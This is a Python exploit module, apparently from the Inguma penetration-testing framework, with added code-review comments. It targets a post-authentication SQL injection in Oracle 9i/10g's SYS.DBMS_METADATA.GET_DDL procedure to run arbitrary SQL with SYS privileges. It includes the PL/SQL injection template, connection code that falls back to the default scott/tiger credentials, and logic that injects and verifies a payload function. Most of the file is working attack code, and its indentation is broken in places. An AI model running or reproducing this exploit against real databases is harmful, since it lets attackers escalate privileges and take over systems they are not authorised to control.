#!/usr/bin/python
#
# Exploit for Oracle9i and Oracle10g prior to CPU Apr 2005
#
# Privileges needed:
#
# - CREATE SESSION
# - CREATE PROCEDURE
#
# Copyright (c) 2006, 2007 Joxean Koret
#
import os
import sys
import time
import socket
import cx_Oracle
from lib import oracleids
from lib import liboracleexploit
from lib.libexploit import CIngumaModule
name = "orainject6"
brief_description = "Oracle 9i/10g SYS.DBMS_METADATA.GET_DDL SQL Injection"
type = "exploit"
affects = ["Oracle 9i and 10g"]
description = """
The procedure SYS.DBMS_METADATA.GET_DDL of Oracle 10g R1 and R2 is vulnerable to a
post-auth SQL Injection which allows the execution of arbitrary SQL code with SYS
privileges.
"""
patch = "Fixed in 10g with CPU Apr. 2005"
category = "exploit"
discoverer = "Too many to enumerate... Reported by NGS Software, I think..."
author = "Joxean Koret <joxeankoret@yahoo.es>"
data ="""
DECLARE
V_L CLOB;
BEGIN
V_L := SYS.DBMS_METADATA.GET_DDL('''||%FUNCTION%||''','');
END;
"""
globals = ["sid", ]
class CDbmsMetadata(CIngumaModule):
    # Class-level option defaults. ``self.port`` and ``self.dict`` are also
    # used by the methods below but are not declared here; presumably they
    # come from CIngumaModule -- confirm against lib/libexploit.
    target = ""          # host/IP placed in the TNS descriptor by connect()
    waitTime = 0         # not used in the visible code
    timeout = 1          # not used in the visible code
    exploitType = 2      # framework classification value (meaning not visible here)
    wizard = False       # not used in the visible code
    services = {}        # NOTE(review): class-level mutable, shared by all instances
    results = {}         # NOTE(review): class-level mutable, shared by all instances
    user = ""            # DB username; readConfig() falls back to 'scott'
    password = ""        # DB password; readConfig() falls back to 'tiger'
    covert = 0           # copied to payload.covert in run()
    sid = ""             # used as SERVICE_NAME in connect(); readConfig() falls back to 'orcl'
    function = "f1"      # copied to payload.function in run()
    payload = None       # payload selector handed to liboracleexploit.getPayload()
    command = None       # only tested for truthiness in run(); its value is not used there
    connection = None    # cx_Oracle connection object set by connect()
def connect(self):
    """Open the cx_Oracle session stored in ``self.connection``.

    The TNS descriptor is assembled from ``self.target``, ``self.port``
    and ``self.sid`` (as SERVICE_NAME) and prefixed with
    ``user/password@``.  ``self.port`` is formatted with ``%d``, so it
    must already be an integer.

    NOTE(review): because the credentials are spliced into the connect
    string, a username or password containing '/', '@' or ')' would be
    mis-parsed by the client library.
    """
    descriptor = (
        "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)"
        "(HOST=%s)(PORT=%d)))(CONNECT_DATA=(SERVICE_NAME=%s)))"
    ) % (self.target, self.port, self.sid)
    credentials = "%s/%s" % (self.user, self.password)
    self.connection = cx_Oracle.connect("%s@%s" % (credentials, descriptor))
    # Rollback followed by commit right after connecting; presumably meant
    # to start from a clean transaction state -- confirm the intent.
    self.connection.rollback()
    self.connection.commit()
def readConfig(self):
if self.user != "":
pass # Username specified
elif self.dict.has_key("user"):
self.user = self.dict["user"]
else:
print "[!] Using default username 'scott'"
self.user = "scott"
if self.password != "":
pass # Password specified
elif self.dict.has_key("password"):
self.password = self.dict["password"]
else:
print "[!] Using default password 'tiger'"
self.password = "tiger"
if self.sid != "":
pass # Ignore, specified
elif self.dict.has_key("sid"):
self.sid = self.dict["sid"]
else:
print "[!] Using sid 'orcl'"
sid = "orcl"
self.sid = sid
def run(self):
    """Framework entry point: resolve options, connect, inject, verify.

    Returns True when ``payload.verify`` reports success and False
    otherwise.  Errors raised while executing the injected statement are
    printed and swallowed, so a failed injection only shows up through the
    verify step and the console output.
    """
    self.readConfig()
    # Try connecting to the instance
    # NOTE(review): this line echoes the password in cleartext on stdout;
    # anything that captures or logs console output retains the credential.
    print "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid)
    self.connect()
    print "[+] Selecting payload ... "
    # The payload object comes from lib.liboracleexploit; the attributes and
    # methods used below (user, function, connection, command, covert,
    # run(), verify()) are inferred from this code -- confirm against it.
    payload = liboracleexploit.getPayload(self.dict, self.payload)
    payload.user = self.user
    payload.function = self.function
    payload.connection = self.connection
    if self.command:
        # NOTE(review): self.command is tested but never passed on; an empty
        # string is assigned instead.  Looks like a bug (self.command meant?)
        # -- confirm before changing.
        payload.command = ""
    print "[+] Covert level is %s" % str(self.covert)
    payload.covert = self.covert
    payload.run()
    # Statement list: a single PL/SQL block built from the module-level
    # ``data`` template, with %FUNCTION% replaced by the payload's function.
    theCommand = ()
    theCommand += (data.replace("%FUNCTION%", payload.function), )
    # NOTE(review): the cursor is never closed explicitly; it is released
    # only when the connection or the object is torn down.
    cursor = self.connection.cursor()
    for command in theCommand:
        print "[+] Running command ... "
        print command
        try:
            cursor.execute(command)
            # Drain any result set; rows are not used.  NOTE(review): after
            # an anonymous PL/SQL block cx_Oracle probably raises "not a
            # query" here, which the except below then prints -- confirm.
            for x in cursor.fetchall():
                pass
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # programming errors; catching the driver's DatabaseError would
            # keep real failures visible.
            print "[!] Exception:"
            print sys.exc_info()[1]
    if payload.verify(self.connection):
        print "[+] Exploit works with selected payload."
        return True
    else:
        print "[!] Exploit doesn't work with selected payload :("
        return False
def printSummary(self):
print